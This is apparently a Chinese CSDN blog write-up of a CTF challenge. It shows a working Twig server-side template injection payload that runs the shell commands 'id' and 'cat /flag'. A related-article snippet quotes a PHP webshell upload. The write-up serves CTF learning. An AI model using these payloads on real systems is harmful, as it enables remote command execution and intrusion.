NO.2-16 [BJDCTF2020]Cookie is so stable

最新推荐文章于 2023-11-23 09:15:06 发布
最新推荐文章于 2023-11-23 09:15:06 发布
阅读量97 收藏
点赞数
分类专栏: 模板注入 BUUCTF
原文链接:https://blog.csdn.net/qq_41628669/article/details/106133130
版权

知识点

    SSTI
    twig

题目提示cookie

在user处尝试注入

{{7*'7'}} 回显7777777 ==> Jinja2
{{7*'7'}} 回显49 ==> Twig

这里为Twig
payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}


获取flag

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}


参考
服务端模板注入攻击
 

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2739
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3375
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
lscat cnindex php,BJDCTF2020--web-复现
weixin_35523284的博客
03-17 334
BJDCTF2020未完待续BuuZJCTF,就这?看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。BUU上和源题好像有点差别。进题放出源码:".file_get_contents($text,'r')."";if(preg_match("/flag/",$file)){die("Not now!");}include($file); //next.php}else{...
ctf刷题和一些比赛wp
m0_73693218的博客
11-23 1471
萌新的ctf刷题日记,文章可能会有大量错误,欢迎各位大佬指教
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1416
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
题目讲解2
aetlypdlg_ys的博客
05-05 217
观察页面,找到漏洞点爆破2333。
题目总结 web 51-100
羽的博客
04-28 4037
0x051 [BJDCTF2020]Mark loves cat 知识点: a=b&c=d foreach($_POST as $x => $y){ echo $x; echo "</br>"; echo $y; echo "</br>"; } 将输出 a b c d 0x052[BJDCTF 2nd]Schrödinger 修改...
BUU刷题记录——2
weixin_43610673的博客
06-17 1568
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
【web-ctf】ctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1963
ctf_BUUCTF_web
cookie.js-JavaScript资源
07-01
cookieAIP
jquery.cookie-min:jquery.cookie 最小化
06-15
《jQuery.cookie-min:深入理解与应用》 在Web开发中,JavaScript库jQuery以其简洁的语法和强大的功能,深受开发者喜爱。而jQuery.cookie-min是jQuery的一个插件,它为JavaScript提供了处理浏览器Cookie的强大工具...
Node.js-webStorage封装库-支持cookie解决方案
08-09
2. **跨域支持**:通过cookie,可以实现数据在不同域名间的共享,这对于单点登录等场景非常有用。 3. **服务器端操作**:可能提供了一些方法,允许在Node.js服务器端读写cookie,方便服务端与客户端数据的交互。 4. ...
js-cookie.js
03-31
js_cookie源码下载,js-cookie用于操作cookie,笔者是因为一开始不会弄,后来会整下来了,鉴于自身经历,故将其分享出来。
socket.io-scaling:通过cookie测试socket.io客户端的扩展
05-01
安装npm install测试方法: 开始后端./start_backend.sh 测试node.js客户端node client.js Java客户端测试./java_client/startJavaClient.sh
pi_heif-0.17.0-pp310-pypy310_pp73-macosx_12_0_x86_64.whl
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
mmexport1722080103662.jpg
07-27
mmexport1722080103662.jpg
matlab 20244a 6
07-27
matlab 20244a 6
pi_heif-0.17.0-cp310-cp310-macosx_12_0_x86_64.whl
最新发布
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
js-cookie获取response.headers的set-cookie
05-30
在JavaScript中,可以使用js-cookie库来获取response.headers的set-cookie。js-cookie库提供了一个方便的方法来操作cookie,通过这个库,我们可以轻松地获取和设置cookie。使用这个库的方法如下: 1. 首先,你需要在你的html文件中引入js-cookie库,可以通过以下方式引入: ``` <script src="https://cdn.jsdelivr.net/npm/js-cookie@3.0.1/dist/js.cookie.min.js"></script> ``` 2. 接着,在获取response的headers时,可以通过response.headers.get('set-cookie')来获取set-cookie的值。 3. 最后,你可以将获取到的set-cookie值设置为cookie,使用js-cookie库的方法如下: ``` Cookies.set('cookieName', cookieValue, { expires: cookieExpires, path: cookiePath }); ``` 其中,cookieName是cookie的名称,cookieValue是cookie的值,expires是cookie的过期时间,path是cookie的路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值